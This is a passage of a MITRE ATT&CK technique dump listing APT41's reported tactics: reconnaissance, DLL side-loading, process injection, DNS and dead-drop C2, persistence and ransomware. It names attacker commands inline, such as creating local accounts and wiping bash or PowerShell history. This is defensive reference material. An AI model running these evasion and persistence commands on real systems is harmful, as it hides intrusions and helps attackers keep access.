Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the <code>net share</code> command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--4f6e677d-427b-4342-b35c-57f4f3ad4ff8
revoked : False
technique : Network Share Discovery
technique_description : Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1135
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Process: OS API Execution', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the <code>netstat</code> command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--a70bd01d-1d79-44e7-afe4-3a83e5a8d70c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1049
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--bcbc885e-c1ae-4e69-a72c-22900403bae3
revoked : False
technique : Exploitation for Client Execution
technique_description : Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use for work, so those applications are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1203
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--ad3eae0f-becd-4ed8-94cf-40a4e1a06a9d
revoked : False
technique : DLL Side-Loading
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--56b47ce2-9baa-421b-9187-c780615b97de
revoked : False
technique : File Deletion
technique_description : Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Command: Command Execution', 'File: File Deletion']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--c4c08678-eee9-475c-9a67-67b15278ec54
revoked : False
technique : Compiled HTML File
technique_description : Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--97775c58-7cb1-46e0-9504-e60a459e44d0
|
||
revoked : False
|
||
technique : Fallback Channels
|
||
technique_description : Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1008
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'Windows', 'macOS']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
|
||
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--e0c1c9b9-b36e-4157-8dc1-26cd9ae25193
revoked : False
technique : Process Injection
technique_description : Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1055
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Access', 'Process: Process Modification', 'File: File Modification', 'Process: Process Metadata', 'File: File Metadata', 'Process: OS API Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--873faf92-be75-47e5-bf3e-b389a5bdc020
revoked : False
technique : DNS
technique_description : Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--adc6b431-0722-4287-8f37-e09ddb5b25fe
revoked : False
technique : System Network Configuration Discovery
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1016
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--635cbe30-392d-4e27-978e-66774357c762
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--410d7922-e288-49ea-9607-27942505a416
revoked : False
technique : Local Account
technique_description : Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1136.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network', 'Containers']
data_sources : ['User Account: User Account Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--6a653820-adc1-4068-ab78-9165f2a2c5c1
revoked : False
technique : Scheduled Task
technique_description : Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> cannot access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Creation', 'File: File Modification', 'File: File Creation', 'Process: Process Creation', 'Command: Command Execution', 'Network Traffic: Network Traffic Flow', 'Scheduled Job: Scheduled Job Creation']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--f8838a1f-3a62-40cc-98dd-55943091fcef
|
||
revoked : False
|
||
technique : Clear Command History
|
||
technique_description : In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
|
||
|
||
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
|
||
|
||
Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or by deleting the bash history file (<code>rm ~/.bash_history</code>).
|
||
|
||
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)
|
||
|
||
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
|
||
|
||
The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
|
||
|
||
Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1070.003
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Network']
|
||
data_sources : ['File: File Deletion', 'File: File Modification', 'Command: Command Execution', 'User Account: User Account Authentication']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used <code>cmd.exe /c</code> to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
|
||
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--81a15403-9bb3-408a-8da6-97c64209c829
|
||
revoked : False
|
||
technique : Windows Command Shell
|
||
technique_description : Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
|
||
|
||
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
|
||
|
||
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
|
||
technique_id : T1059.003
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Command: Command Execution', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--acfaf7ec-7b92-40ec-a844-17089791a663
|
||
revoked : False
|
||
technique : Data Encrypted for Impact
|
||
technique_description : Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
|
||
|
||
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
|
||
|
||
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
|
||
|
||
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
|
||
technique_id : T1486
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'IaaS']
|
||
data_sources : ['File: File Modification', 'Cloud Storage: Cloud Storage Modification', 'Network Share: Network Share Access', 'File: File Creation', 'Command: Command Execution', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--964a9222-6e88-4850-89cc-6fc0f10ee4c9
|
||
revoked : False
|
||
technique : Dead Drop Resolver
|
||
technique_description : Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
|
||
|
||
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
|
||
|
||
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1102.001
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
|
||
permissions_required : ['User']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--9ebc2d8a-a945-4b5d-805f-56e16bcc6676
|
||
revoked : False
|
||
technique : Resource Hijacking
|
||
technique_description : Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
|
||
|
||
